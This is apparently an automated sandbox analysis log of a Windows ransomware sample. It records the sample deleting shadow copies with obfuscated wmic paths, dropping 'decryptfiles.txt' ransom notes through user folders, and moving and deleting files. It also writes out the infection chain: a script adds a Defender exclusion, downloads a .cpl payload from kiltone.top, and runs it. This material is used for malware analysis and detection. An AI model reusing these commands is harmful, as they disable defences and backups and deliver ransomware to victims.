Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\ihzCRF\ihzC\..\..\Windows\ihzC\ihzC\..\..\system32\ihzC\ihzC\..\..\wbem\ihzC\ihzCR\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\ONkVQK\ONkV\..\..\Windows\ONkV\ONkV\..\..\system32\ONkV\ONkV\..\..\wbem\ONkV\ONkVQ\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\MqHRzl\MqHR\..\..\Windows\MqHR\MqHR\..\..\system32\MqHR\MqHR\..\..\wbem\MqHR\MqHRz\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\sZJidg\sZJi\..\..\Windows\sZJi\sZJi\..\..\system32\sZJi\sZJi\..\..\wbem\sZJi\sZJid\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\IgQfcH\IgQf\..\..\Windows\IgQf\IgQf\..\..\system32\IgQf\IgQf\..\..\wbem\IgQf\IgQfc\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\ONkVQK\ONkV\..\..\Windows\ONkV\ONkV\..\..\system32\ONkV\ONkV\..\..\wbem\ONkV\ONkVQ\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\HdMVWr\HdMV\..\..\Windows\HdMV\HdMV\..\..\system32\HdMV\HdMV\..\..\wbem\HdMV\HdMVW\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\MqHRzl\MqHR\..\..\Windows\MqHR\MqHR\..\..\system32\MqHR\MqHR\..\..\wbem\MqHR\MqHRz\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\ihzCRF\ihzC\..\..\Windows\ihzC\ihzC\..\..\system32\ihzC\ihzC\..\..\wbem\ihzC\ihzCR\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess created: C:\Windows\System32\wbem\WMIC.exe c:\sZJidg\sZJi\..\..\Windows\sZJi\sZJi\..\..\system32\sZJi\sZJi\..\..\wbem\sZJi\sZJid\..\..\wmic.exe shadowcopy delete
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\local\temp\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\aqrfevrtgl\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\dqofhvhtmg\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\ewzcvgnowt\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\gigiytffyt\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\hqjbrdykde\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\klizusiqen\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\lijdsfkjzg\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\nymmpceima\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\desktop\zipxyxwioy\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\aqrfevrtgl\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\dqofhvhtmg\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\ewzcvgnowt\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\gigiytffyt\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\hqjbrdykde\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\klizusiqen\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\lijdsfkjzg\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\my music\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\my pictures\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\my videos\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\nymmpceima\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\zipxyxwioy\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\pictures\camera roll\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\pictures\saved pictures\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\.ms-ad\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\3d objects\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\dc\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\dc\collab\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\dc\forms\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\dc\jscache\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\dc\security\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\dc\security\crlcache\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\acrobat\preflight acrobat continuous\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\crlogs\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\crlogs\crashlogs\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\flash player\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\flash player\nativecache\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\headlights\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\linguistics\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\logtransport2\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\logtransport2cc\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\rttransfer\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\sonar\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\adobe\sonar\sonarcc\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\com.adobe.dunamis\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\com.adobe.dunamis\56079431-ea46-4833-94f9-1ff5658cdb1c\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\com.adobe.dunamis\61f56613-c62c-4b17-84dd-62b60d5776aa\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\com.adobe.dunamis\6d9d9777-7ded-4768-8191-9a707d72b009\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\com.adobe.dunamis\f2eb6c79-671d-4de2-b7be-3b2eea7abc47\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\addins\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\credentials\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\crypto\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\crypto\keys\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\crypto\rsa\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-2246122658-3693405117-2476756634-1003\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\excel\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\excel\xlstart\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\implicitappshortcuts\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\userdata\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\internet explorer\userdata\low\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\network\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\network\connections\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\network\connections\pbk\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\network\connections\pbk\_hiddenpbk\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\protect\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\protect\s-1-5-21-2246122658-3693405117-2476756634-1003\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\speech\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\spelling\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\systemcertificates\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\certificates\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\crls\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\systemcertificates\my\ctls\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\vault\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\accountpictures\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\cloudstore\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\libraries\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\network shortcuts\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\printer shortcuts\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\recent\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\recent\automaticdestinations\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\recent\customdestinations\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\recent items\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\sendto\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\accessibility\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\accessories\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\administrative tools\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\chrome apps\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\maintenance\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\system tools\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\windows powershell\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\templates\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\themes\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\microsoft\windows\themes\cachedfiles\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\extensions\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\crash reports\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\crash reports\events\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\pending pings\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\bookmarkbackups\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\crashes\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\crashes\events\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\datareporting\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\datareporting\archived\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\datareporting\archived\2023-10\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\datareporting\glean\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\datareporting\glean\db\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\datareporting\glean\events\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\datareporting\glean\pending_pings\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\datareporting\glean\tmp\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\minidumps\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\saved-telemetry-pings\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\security_state\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\sessionstore-backups\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\storage\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\storage\permanent\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\storage\permanent\chrome\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\storage\permanent\chrome\idb\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\storage\permanent\chrome\idb\1657114595amcateirvtisty.files\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\13pckee1.default-release\storage\to-be-removed\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\appdata\roaming\mozilla\firefox\profiles\ov4x28i2.default\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\contacts\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\cookies\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\documents\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\downloads\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\favorites\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\favorites\links\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\links\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\onedrive\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\recent\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\saved games\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\user\searches\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\accountpictures\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\documents\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\documents\my music\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\documents\my pictures\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\documents\my videos\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\downloads\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile created: c:\users\public\libraries\decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile moved: C:\Users\user\Desktop\GIGIYTFFYT\ZIPXYXWIOY.jpg
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile deleted: C:\Users\user\Desktop\GIGIYTFFYT\ZIPXYXWIOY.jpg
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile moved: C:\Users\user\Desktop\GIGIYTFFYT\TQDFJHPUIU.xlsx
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile deleted: C:\Users\user\Desktop\GIGIYTFFYT\TQDFJHPUIU.xlsx
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile moved: C:\Users\user\Desktop\KLIZUSIQEN.docx

System Summary

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\eryy65ty.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\fjeljies.cplJump to dropped file
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmp
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmp
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cpl
